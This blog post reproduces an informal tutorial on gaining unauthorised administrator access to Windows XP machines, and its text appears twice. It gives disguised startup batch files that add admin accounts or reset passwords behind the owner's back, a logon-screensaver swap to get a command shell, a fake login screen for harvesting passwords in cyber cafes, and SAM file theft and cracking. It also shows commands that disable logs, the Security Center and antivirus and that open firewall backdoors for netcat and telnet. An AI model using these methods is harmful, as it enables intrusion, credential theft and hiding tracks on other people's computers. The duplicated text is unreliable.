10:00 PM
Ajay Goswami
1.First thing to try
ok, lets start with the very basics. this is a method that a LOT of windows boxes are vulnerable to. The main targets of people that are vulnerable are those who bought their box with windows xp on it already (ie. it was installed by the people who made it or the shop who sold it)
now when they do this, they do not set administrator passwords, simply because there would be no effective way of telling the buyer this password, considering how many are sold everyday all over the world.
ok, so enough chat, go to the login screen. and hold ctrl+alt and press delete twice. now a login box should pop up.
enter the username administrator, and leave the password blank. if you login congratulations, you are now administrator on a windows box (wow! thats 1337!! *looks sarcasic*)
if you dont log in, then try admin or administrator as the passwords. if not, then never mind. we still have tonnes of ways to try before we give up and smash the damn thing with a hammer.
2. alternative first thing to try.
now, if 1) doesnt work this wont, but its just a different way of accomplishing 1). when the pc is booting press f8 or f5 and select boot in safe mode. then try and click on administrator.
ta-da
3. underhand trickery.
this method will add you as a user by placing a batch file in this folder
C:\Documents and Settings\<admin user>\Start Menu\Programs\Startup
in the batch file have something to add you to the administrators here is one
#####################################start#############################
@title Windows Security check up
net user <put your username here> <password here> /ADD
@cls
net localgroup administrators <the account name above> /ADD
@cls
exit
#######################################end#############################
put that in notepad and save as checkup.bat and put it in the above folder. *make saure you replace everything you need to first*.
this will flash for a fraction of a second on most pcs and if your lucky they may be looking away, and not notice, and if they do they will have no idea what it did......
now just hope they dont see your new user, this works best if there are lots of users.
please note that from a limited account you can't access other people documents so you will have to be sneaky copy it there when they to the loo or something
4. Another unhand method.
this is the same concept as above, but heres what the batch file says
#######################################start###########################
@title windows check-up service
net user administrator admin
cls
exit
#########################################end###########################
this is probably the best method as long as the person who is in the administrators group doesnt use that acount.
it changes the administrator pass to admin, and so just log in like in section one, but you know the pass.....
to add those files all you need to do, is to place it in their startup folder like above. doesnt matter how, but its very possible for you to be able to do it from a guest or limited account if the person who is admin is stupid.
all you need is to make sure their files arent private...
5. Accessing all files on the computer, with the exception of certain system files like SAM
ok, just suppose you want access the admin account to read their saved msn history for example. or Maybe they are stupid (like most computer users) and have a file with their passwords so they dont have to remember them, just their login for that computer.
the reasons are endless. now, if the person has any knowledge about computers they will make all of their files private so only they can see them....
ah, how can i get to their files then??
well its very simple and can be done from any account with registry write access. It may be achieved from guest user, as there are many tools that allow registry editing even if your not admin. (im not sure exactly if they actually work, but if they do wippe!!)
if you go to the registry entry:
my computer\HKEY_USERS\S-1-5-18\Control Panel\Desktop
(*the number in the middle may vary on your pc)
and now you should see a lot of interesting things. heres the important one:
SCRNSAVE.exe logon.scr
or something like that.
as we all know .scr is a screen saver, so we can see that this is where the screen saver is defined when we are motionless for a certain time while on the login screen.
so, this is good to know, that we can change the screen saver at the login screen.
but hey wait, lets thing about this. what if we replaced logon.scr with something else, another program. hey what about command prompt?
try it change logon.scr to cmd.exe
now the problem is that we have to wait ages for the screen saver to activate, so above that, their should be a screensavertimeout option. change that from whatever it is (600 default) to 1. now log off and wait 1 second and you have command prompt!!
you can access private directories etc.
also, you can run any program from the command prompt, like a super user wow!
now, if you can't write to that part of the registry, then it can be achieved through command line (as well as a batch file. the command is reg. work it out yourself!!)
6.Theoretical windows password logger.
now i am currently in the stages of building this in vb (come on cut me some slack, i know vb is a hhl and frankly quite no0bish, but it will be so much quicker, and the commands are straight forward. hell, im not goin to spend months programming something with that much GUI in something like perl, or assembly, or any of those powerful languages that either take ages to program a decent interactive GUI {like perl or asm})
well enough ranting about vb and programming. this is my idea, which i share with you freely.
since you can execute an .exe as a screen saver and it will not return from screen saver until that program is closed, we could fassion a fake login screen, to look the same as the real one, but to give a fake "password incorrect message" when the password is typed, and then to log the input to a text file, so we then have a list of usernames and passwords for this computer. and it can all be done without admin rights, assuming you can access vb or whicheva app you chose to program in, and have a cracked registry editor to allow you to switch logon.scr with your app (please note you have to give the full path of the app, if the system doesnt have it {ie go to run and type the name of the app without the path, and if it doesnt run then you need to put the whole path in. For example you only need to type cmd.exe not C:\windows\system32\cmd.exe})
so, now we can see how somebody with a moderate knowledge of a basic hll (ie vb) can get a list of passwords for all the users. this works very well if the computer has a lot of users.
*heres a thought, get everything you need to do this on a cd/usb stick whateva, and do this in a cyber cafe which requires you to have an account. now thats a lot of pass' you could get*
n.b. this idea was formed after seeing and programming a fake msn login to get passwords and usernames. its the same effect really. thats another thing that you could put in a cyber cafe, and there you go a load of msn passwords with usernames.
({also, remember, you can use the free VB.NET, but this requires some runtimes and files and environment stuff that will need to be installed for the file to work. you are given the option to do this at the install time, but its a lot less convenient. as far as i know vb 6.0 can run on most xp sp-2})
7. Manipulation of various things.
ok, this section is about dispelling some of the hacking myths about windows. people seem to assume that some stuff wil work without actually testing it.
7.1 Cain
now, on some of the forums i visit, some people seem to think that cain can hack for you. Nope. you cannot run cain without local administrator rights. thats right kids, those of you who think that you can put it on a usb stick, dumb the hashes, crack them and get access are sadly wrong.
it will not work.
however what will work is if you obtain the hashes and the encryption key, you can crack them to get hashes cain can crack, albeit on another computer where you are admin.
7.2 SAM myths
ok, the sam file. it seems to be that people say stuff about hacking windows without actually ever having hacked a windows box. the SAM file cannot be obtain through a MS-DOS floppy. some guy must have thought of the idea, and decided there was no reason why it wouldnt work. and published a tutorial about it without ever trying it.
7.3 command prompt myths
ok, now its everywhere. people saying if your a limited user, just type "net user <admin name> <what you want their password to be>" and it will change their password.
this has never worked for me. people have told me it works, but ill bet they just tried it on the account they were on, which is most likely computer admin, who can execute that command. limited users cant though.
7.4 2 ways to obtain the sam file, that actually work, and that i have personally tried out.
1)
NFTS bootable floppy disk
ok, get a blank floppy and go to www.nfts.com (if not try .org). there they have a tool to create a boot floppy. download it, run it, and create a bootable floppy. now shutdown, put the floppy in the drive and boot the pc. hopefully it should boot the floopy. this DOS style GUI will allow you to scan for deleted files, securely delete files, and of course view and edit ANY files (including copy!!)
so simply navagate to SAM (C:\windows\system32\config\ **learn that location by heart. also learn all the locations of important programs, and learn all of the commands for command prompt, and registry syntax and stuff by heat. its very useful)
and now copy the SAM and System and security files (those are the names). you may need to swap the floppy to fit them on.
2) linux live cd
this is a method that most seasoned hackers prefer. it can be a lot quicker if you know what you are doing. this varies from live cd to live cd, but basicly boot it up like you did with the floppy, and then mount your partition that has windows on it, (look at the instructions on how to do this) then navigate to the directory with sam, and just copy the files, and put them somewhere like your documents.
what to do once you have SAM and the other files
ok, basicly, you will need to load the SAM file with a sam cracker that will allow you to decrypt the hashes using the system and security files. SAMinside is an example.
so, crack them to get the NTLM hashes, load them into cain and crack them to get a full list of passwords for that machine.
its not as difficult as it sounds.
right, so now, you have a detailed knowledge of how to get admin access on any single widnows box.
some of these methods also work for network hacking. the add and change user password methods will work, and i havent tried the fake login screen but that could possibly work as well. (you could always cut the network cable out, hack your way onto an account on the local machine, find the administrator password, chances are is it will be the same as the network admin pass, as long as the same person set them up.
if your on a network computer but as a standalone box, you could run the fake login screen you made, tell the admin you cant login and watch them as they login and bingo you have their password. hope you got all that).
8. Misc windows hacking stuff.
ok this is basicly some things relating to hacking windows, but that will not strictly gain you access to admin. Please note that i have not tried all of these from a guest user, but on admin they all work. As far as i am aware the logs can be disabled by any user who has access to the system32/config directory (and by default all users do)
also, this can all be achieved throught the windows GUI quite easily, and the commands seem to be more useful for those who have remote console access, but cant run anything outside the console.
8.1 to end the windows security centre:
batch file/command from command prompt
###############################start##################################
@net stop "security Center"
##############################end#####################################
simple but deadly.
this will end the winodws firewall, until they restart their pc. this means you could get this to be run, and then set up something to give you a remote shell.
command to end a process. Please note you cannot use this to end a system process, that must be done through taskmanager.
#######################################start###########################
tskill <processname>
######################################end#############################
e.g. tskill cmd
that will end command prompt. and dont put the extension on, like .exe.
if you have a remote shell you can just type taskmgr.exe and press enter to get the task manager, and yeh. (unless your shell is configured to only allow console access)
so, this could in theory end stuff like explorer.exe from a remote shell.
to start the control panel
####################################start##############################
control
####################################end################################
just type this and the control panel will pop up. this doesnt really have much use in a batch file.
however, it could be very useful remotely.
8.2 windows xp logs.
how to disbale the window xp logs.
###########################start#######################################
attrib +R Sysevent.evt
atrrib +R Secevent.evt
attrib +R AppEvent.evt
############################end########################################
wow, that sets read only attributes, so they cant be written to.
please note this is not comprehensively tested by me...in theory it should work but i cant guarentee..
8.205
another tool to clear your logs, which is just as effect as disabling them. its called clearlog..google it.
8.3 How to set up a backdoor straight through the windows firewall.
ok, you have a command prompt shell, but you want to be able to keep it. you could for example, have netcat to set up to listen for your telnet attempt. but what about the firewall?
well in your remote command prompt type:
##################################start################################
netsh firewall add allowedprogram C:/netcat.exe Security checker ENABLE
##################################end##################################
that will set the name of the exception to Security checker and will mean that you will not be warned of netcat by the firewall, so it can be undetectable if you run it in trojan mode..
to display the current config of the firewall
###################################start###############################
netsh firewall show config
###################################end#################################
also, try
####################################start##############################
netsh firewall show logging
###################################end#################################
that will give you infomation about the log, which you could delete, clear of all data, or you could disable it like this:
####################################start##############################
netsh firewall set logging <the file location in 'show logging'> 0 {connections = DISABLE}
######################################################################
the number is the max size so setting it to 0 will clear it. if you put the bit in the curley brackets (dont include the brackets!!!) it will disable logging of all connections.
8.4 End virus scanners.
ok, this is not just a command, it can be put in batch files as well.
we know how to end the windows firewall and security centre, and to end independant process' we have to know what it is.
we could do a batch file that searches for all the normal locations of a virus scanner, and the normal types. for this we would need to do some research, which i will leave to you.
heres an exmample, how to end anti virus guard.
#############################start#####################################
TASKKILL /F /IM avgnt.exe
##############################end######################################
we can see how useful that could be.
now, this can be useful because virus scanners often pick up exploits, which would help us in some way....
8.5 ok, so you know what to do, how to do it...
right, now most people know that a windows xp box doesn't listen for incoming connections that could be useful to a hacker, such as telnet.
however, not many people that xp has a telnet server by default which will accept telnet attempts, when its running. however it doesn't run by default.
to run it the command is
#######################################################################
tlntsrv
#######################################################################
you know all the ways you can execute that.
now, be aware it does ask for a login, and doesn't accept blank passwords, for administrator for example.
however, this can be a very useful back door as it is silent, and doesnt require command line options like netcat.
this means no annoying batch file to execute it in trojan mode everytime. if you just place it in the startup folder its always running.
so, just assume you could have a single batch file like this:
####################################start##############################
@title Windows Check-up
@copy C:\windows\system32\tlntsvr.exe C:\Documents and Settings\<user>\Start Menu\Programs\Startup
################################end####################################
ok, so now you know. Also you can edit the settings and various authentication methods. im not gunna tell you everything. you can do some research, afterall i have got you this far.
8.6
this is a small section, its just the command to alter the registry from the command line. its simply
###
reg
#####
there are the options and syntax given when you type it.
8.7 How to secure your windows box from hacking attempts.
ok, the title says it all. heres a list of the things that come to mind.
1. have a decent virus scanner, and make sure it is up to date
2. run another firewall, not the windows one.
3. make sure the administrator passwd is longish..and not in the dictionary.
4. disable all registry access to all non-admin
5. check your firewall for exceptions often. make sure you know about them all.
6. make a point of checking your startup folder.
7. deny access to the windows files for non-admins.
8. configure everything. dont have the default locations for important things like firewall logs.
9. if something like a command box pops up when you log on, and it goes too quickly to see what it said,check all your users status' and access rights. Check all important places to make sure everything is ok.
10. Be sensible. Dont accept NAKED_CHICZ.jpeg.exe
11. backup everything important. if you need to keep your passwords somewhere, keep them on a usb stick or something so that an attacker cannot view your files and get your passwds for every site and account you own.
well thats all i can think of for now...
9.0 recap etc
ok, so in this tutorial, we have learnt a lot. We know how to add users and administrators to a local pc, we know how to disable xp logs, we know how to end the firewall, we know how to make an exception in the firewall, we can end the security centre, we can end process' that we want to end. we can disable the firewall logs, we can get and decrypt the sam file, we have covered what commands and things dont work. we have done a registry edit to allow us to view and edit any files not in use on the pc, regardless of security restrictions on them.
it is possible if you are on the pc to enable a guest user as a telnet account.
now thats alot. and it doesn't involve some stupid sk tools that give you higher privilages without any effort.
i will admit that if this is done remotely then you may need to use a trojan of some kind to spawn you a command prompt shell. However, you may not, for example, they may be running the bios port, which is usually considered the easiest remote hack for windows.
they may run a website off their box which is a possible way in if its self coded, or even poorly coded.
also look out for port 79, the finger port, which will give you info about the comp.
also, my final command for you to try is the 'systeminfo' tool. it will give you some useful info and a lot about the hardware of the pc.
please tell me if something in hear is wrong, i did get very tired typing this and there are probably some mistakes...dont tell me about typos unless they are in commands...
thats about it, a fairly comprehensive tutorial on hacking windows xp, by (0)-_360_-(0)
ok, lets start with the very basics. this is a method that a LOT of windows boxes are vulnerable to. The main targets of people that are vulnerable are those who bought their box with windows xp on it already (ie. it was installed by the people who made it or the shop who sold it)
now when they do this, they do not set administrator passwords, simply because there would be no effective way of telling the buyer this password, considering how many are sold everyday all over the world.
ok, so enough chat, go to the login screen. and hold ctrl+alt and press delete twice. now a login box should pop up.
enter the username administrator, and leave the password blank. if you login congratulations, you are now administrator on a windows box (wow! thats 1337!! *looks sarcasic*)
if you dont log in, then try admin or administrator as the passwords. if not, then never mind. we still have tonnes of ways to try before we give up and smash the damn thing with a hammer.
2. alternative first thing to try.
now, if 1) doesnt work this wont, but its just a different way of accomplishing 1). when the pc is booting press f8 or f5 and select boot in safe mode. then try and click on administrator.
ta-da
3. underhand trickery.
this method will add you as a user by placing a batch file in this folder
C:\Documents and Settings\<admin user>\Start Menu\Programs\Startup
in the batch file have something to add you to the administrators here is one
#####################################start#############################
@title Windows Security check up
net user <put your username here> <password here> /ADD
@cls
net localgroup administrators <the account name above> /ADD
@cls
exit
#######################################end#############################
put that in notepad and save as checkup.bat and put it in the above folder. *make saure you replace everything you need to first*.
this will flash for a fraction of a second on most pcs and if your lucky they may be looking away, and not notice, and if they do they will have no idea what it did......
now just hope they dont see your new user, this works best if there are lots of users.
please note that from a limited account you can't access other people documents so you will have to be sneaky copy it there when they to the loo or something
4. Another unhand method.
this is the same concept as above, but heres what the batch file says
#######################################start###########################
@title windows check-up service
net user administrator admin
cls
exit
#########################################end###########################
this is probably the best method as long as the person who is in the administrators group doesnt use that acount.
it changes the administrator pass to admin, and so just log in like in section one, but you know the pass.....
to add those files all you need to do, is to place it in their startup folder like above. doesnt matter how, but its very possible for you to be able to do it from a guest or limited account if the person who is admin is stupid.
all you need is to make sure their files arent private...
5. Accessing all files on the computer, with the exception of certain system files like SAM
ok, just suppose you want access the admin account to read their saved msn history for example. or Maybe they are stupid (like most computer users) and have a file with their passwords so they dont have to remember them, just their login for that computer.
the reasons are endless. now, if the person has any knowledge about computers they will make all of their files private so only they can see them....
ah, how can i get to their files then??
well its very simple and can be done from any account with registry write access. It may be achieved from guest user, as there are many tools that allow registry editing even if your not admin. (im not sure exactly if they actually work, but if they do wippe!!)
if you go to the registry entry:
my computer\HKEY_USERS\S-1-5-18\Control Panel\Desktop
(*the number in the middle may vary on your pc)
and now you should see a lot of interesting things. heres the important one:
SCRNSAVE.exe logon.scr
or something like that.
as we all know .scr is a screen saver, so we can see that this is where the screen saver is defined when we are motionless for a certain time while on the login screen.
so, this is good to know, that we can change the screen saver at the login screen.
but hey wait, lets thing about this. what if we replaced logon.scr with something else, another program. hey what about command prompt?
try it change logon.scr to cmd.exe
now the problem is that we have to wait ages for the screen saver to activate, so above that, their should be a screensavertimeout option. change that from whatever it is (600 default) to 1. now log off and wait 1 second and you have command prompt!!
you can access private directories etc.
also, you can run any program from the command prompt, like a super user wow!
now, if you can't write to that part of the registry, then it can be achieved through command line (as well as a batch file. the command is reg. work it out yourself!!)
6.Theoretical windows password logger.
now i am currently in the stages of building this in vb (come on cut me some slack, i know vb is a hhl and frankly quite no0bish, but it will be so much quicker, and the commands are straight forward. hell, im not goin to spend months programming something with that much GUI in something like perl, or assembly, or any of those powerful languages that either take ages to program a decent interactive GUI {like perl or asm})
well enough ranting about vb and programming. this is my idea, which i share with you freely.
since you can execute an .exe as a screen saver and it will not return from screen saver until that program is closed, we could fassion a fake login screen, to look the same as the real one, but to give a fake "password incorrect message" when the password is typed, and then to log the input to a text file, so we then have a list of usernames and passwords for this computer. and it can all be done without admin rights, assuming you can access vb or whicheva app you chose to program in, and have a cracked registry editor to allow you to switch logon.scr with your app (please note you have to give the full path of the app, if the system doesnt have it {ie go to run and type the name of the app without the path, and if it doesnt run then you need to put the whole path in. For example you only need to type cmd.exe not C:\windows\system32\cmd.exe})
so, now we can see how somebody with a moderate knowledge of a basic hll (ie vb) can get a list of passwords for all the users. this works very well if the computer has a lot of users.
*heres a thought, get everything you need to do this on a cd/usb stick whateva, and do this in a cyber cafe which requires you to have an account. now thats a lot of pass' you could get*
n.b. this idea was formed after seeing and programming a fake msn login to get passwords and usernames. its the same effect really. thats another thing that you could put in a cyber cafe, and there you go a load of msn passwords with usernames.
({also, remember, you can use the free VB.NET, but this requires some runtimes and files and environment stuff that will need to be installed for the file to work. you are given the option to do this at the install time, but its a lot less convenient. as far as i know vb 6.0 can run on most xp sp-2})
7. Manipulation of various things.
ok, this section is about dispelling some of the hacking myths about windows. people seem to assume that some stuff wil work without actually testing it.
7.1 Cain
now, on some of the forums i visit, some people seem to think that cain can hack for you. Nope. you cannot run cain without local administrator rights. thats right kids, those of you who think that you can put it on a usb stick, dumb the hashes, crack them and get access are sadly wrong.
it will not work.
however what will work is if you obtain the hashes and the encryption key, you can crack them to get hashes cain can crack, albeit on another computer where you are admin.
7.2 SAM myths
ok, the sam file. it seems to be that people say stuff about hacking windows without actually ever having hacked a windows box. the SAM file cannot be obtain through a MS-DOS floppy. some guy must have thought of the idea, and decided there was no reason why it wouldnt work. and published a tutorial about it without ever trying it.
7.3 command prompt myths
ok, now its everywhere. people saying if your a limited user, just type "net user <admin name> <what you want their password to be>" and it will change their password.
this has never worked for me. people have told me it works, but ill bet they just tried it on the account they were on, which is most likely computer admin, who can execute that command. limited users cant though.
7.4 2 ways to obtain the sam file, that actually work, and that i have personally tried out.
1)
NFTS bootable floppy disk
ok, get a blank floppy and go to www.nfts.com (if not try .org). there they have a tool to create a boot floppy. download it, run it, and create a bootable floppy. now shutdown, put the floppy in the drive and boot the pc. hopefully it should boot the floopy. this DOS style GUI will allow you to scan for deleted files, securely delete files, and of course view and edit ANY files (including copy!!)
so simply navagate to SAM (C:\windows\system32\config\ **learn that location by heart. also learn all the locations of important programs, and learn all of the commands for command prompt, and registry syntax and stuff by heat. its very useful)
and now copy the SAM and System and security files (those are the names). you may need to swap the floppy to fit them on.
2) linux live cd
this is a method that most seasoned hackers prefer. it can be a lot quicker if you know what you are doing. this varies from live cd to live cd, but basicly boot it up like you did with the floppy, and then mount your partition that has windows on it, (look at the instructions on how to do this) then navigate to the directory with sam, and just copy the files, and put them somewhere like your documents.
what to do once you have SAM and the other files
ok, basicly, you will need to load the SAM file with a sam cracker that will allow you to decrypt the hashes using the system and security files. SAMinside is an example.
so, crack them to get the NTLM hashes, load them into cain and crack them to get a full list of passwords for that machine.
its not as difficult as it sounds.
right, so now, you have a detailed knowledge of how to get admin access on any single widnows box.
some of these methods also work for network hacking. the add and change user password methods will work, and i havent tried the fake login screen but that could possibly work as well. (you could always cut the network cable out, hack your way onto an account on the local machine, find the administrator password, chances are is it will be the same as the network admin pass, as long as the same person set them up.
if your on a network computer but as a standalone box, you could run the fake login screen you made, tell the admin you cant login and watch them as they login and bingo you have their password. hope you got all that).
8. Misc windows hacking stuff.
ok this is basicly some things relating to hacking windows, but that will not strictly gain you access to admin. Please note that i have not tried all of these from a guest user, but on admin they all work. As far as i am aware the logs can be disabled by any user who has access to the system32/config directory (and by default all users do)
also, this can all be achieved throught the windows GUI quite easily, and the commands seem to be more useful for those who have remote console access, but cant run anything outside the console.
8.1 to end the windows security centre:
batch file/command from command prompt
###############################start##################################
@net stop "security Center"
##############################end#####################################
simple but deadly.
this will end the winodws firewall, until they restart their pc. this means you could get this to be run, and then set up something to give you a remote shell.
command to end a process. Please note you cannot use this to end a system process, that must be done through taskmanager.
#######################################start###########################
tskill <processname>
######################################end#############################
e.g. tskill cmd
that will end command prompt. and dont put the extension on, like .exe.
if you have a remote shell you can just type taskmgr.exe and press enter to get the task manager, and yeh. (unless your shell is configured to only allow console access)
so, this could in theory end stuff like explorer.exe from a remote shell.
to start the control panel
####################################start##############################
control
####################################end################################
just type this and the control panel will pop up. this doesnt really have much use in a batch file.
however, it could be very useful remotely.
8.2 windows xp logs.
how to disbale the window xp logs.
###########################start#######################################
attrib +R Sysevent.evt
atrrib +R Secevent.evt
attrib +R AppEvent.evt
############################end########################################
wow, that sets read only attributes, so they cant be written to.
please note this is not comprehensively tested by me...in theory it should work but i cant guarentee..
8.205
another tool to clear your logs, which is just as effect as disabling them. its called clearlog..google it.
8.3 How to set up a backdoor straight through the windows firewall.
ok, you have a command prompt shell, but you want to be able to keep it. you could for example, have netcat to set up to listen for your telnet attempt. but what about the firewall?
well in your remote command prompt type:
##################################start################################
netsh firewall add allowedprogram C:/netcat.exe Security checker ENABLE
##################################end##################################
that will set the name of the exception to Security checker and will mean that you will not be warned of netcat by the firewall, so it can be undetectable if you run it in trojan mode..
to display the current config of the firewall
###################################start###############################
netsh firewall show config
###################################end#################################
also, try
####################################start##############################
netsh firewall show logging
###################################end#################################
that will give you infomation about the log, which you could delete, clear of all data, or you could disable it like this:
####################################start##############################
netsh firewall set logging <the file location in 'show logging'> 0 {connections = DISABLE}
######################################################################
the number is the max size so setting it to 0 will clear it. if you put the bit in the curley brackets (dont include the brackets!!!) it will disable logging of all connections.
8.4 End virus scanners.
ok, this is not just a command, it can be put in batch files as well.
we know how to end the windows firewall and security centre, and to end independant process' we have to know what it is.
we could do a batch file that searches for all the normal locations of a virus scanner, and the normal types. for this we would need to do some research, which i will leave to you.
heres an exmample, how to end anti virus guard.
#############################start#####################################
TASKKILL /F /IM avgnt.exe
##############################end######################################
we can see how useful that could be.
now, this can be useful because virus scanners often pick up exploits, which would help us in some way....
8.5 ok, so you know what to do, how to do it...
right, now most people know that a windows xp box doesn't listen for incoming connections that could be useful to a hacker, such as telnet.
however, not many people that xp has a telnet server by default which will accept telnet attempts, when its running. however it doesn't run by default.
to run it the command is
#######################################################################
tlntsrv
#######################################################################
you know all the ways you can execute that.
now, be aware it does ask for a login, and doesn't accept blank passwords, for administrator for example.
however, this can be a very useful back door as it is silent, and doesnt require command line options like netcat.
this means no annoying batch file to execute it in trojan mode everytime. if you just place it in the startup folder its always running.
so, just assume you could have a single batch file like this:
####################################start##############################
@title Windows Check-up
@copy C:\windows\system32\tlntsvr.exe C:\Documents and Settings\<user>\Start Menu\Programs\Startup
################################end####################################
ok, so now you know. Also you can edit the settings and various authentication methods. im not gunna tell you everything. you can do some research, afterall i have got you this far.
8.6
this is a small section, its just the command to alter the registry from the command line. its simply
###
reg
#####
there are the options and syntax given when you type it.
8.7 How to secure your windows box from hacking attempts.
ok, the title says it all. heres a list of the things that come to mind.
1. have a decent virus scanner, and make sure it is up to date
2. run another firewall, not the windows one.
3. make sure the administrator passwd is longish..and not in the dictionary.
4. disable all registry access to all non-admin
5. check your firewall for exceptions often. make sure you know about them all.
6. make a point of checking your startup folder.
7. deny access to the windows files for non-admins.
8. configure everything. dont have the default locations for important things like firewall logs.
9. if something like a command box pops up when you log on, and it goes too quickly to see what it said,check all your users status' and access rights. Check all important places to make sure everything is ok.
10. Be sensible. Dont accept NAKED_CHICZ.jpeg.exe
11. backup everything important. if you need to keep your passwords somewhere, keep them on a usb stick or something so that an attacker cannot view your files and get your passwds for every site and account you own.
well thats all i can think of for now...
9.0 recap etc
ok, so in this tutorial, we have learnt a lot. We know how to add users and administrators to a local pc, we know how to disable xp logs, we know how to end the firewall, we know how to make an exception in the firewall, we can end the security centre, we can end process' that we want to end. we can disable the firewall logs, we can get and decrypt the sam file, we have covered what commands and things dont work. we have done a registry edit to allow us to view and edit any files not in use on the pc, regardless of security restrictions on them.
it is possible if you are on the pc to enable a guest user as a telnet account.
now thats alot. and it doesn't involve some stupid sk tools that give you higher privilages without any effort.
i will admit that if this is done remotely then you may need to use a trojan of some kind to spawn you a command prompt shell. However, you may not, for example, they may be running the bios port, which is usually considered the easiest remote hack for windows.
they may run a website off their box which is a possible way in if its self coded, or even poorly coded.
also look out for port 79, the finger port, which will give you info about the comp.
also, my final command for you to try is the 'systeminfo' tool. it will give you some useful info and a lot about the hardware of the pc.
please tell me if something in hear is wrong, i did get very tired typing this and there are probably some mistakes...dont tell me about typos unless they are in commands...
thats about it, a fairly comprehensive tutorial on hacking windows xp, by (0)-_360_-(0)
0 comments:
Post a Comment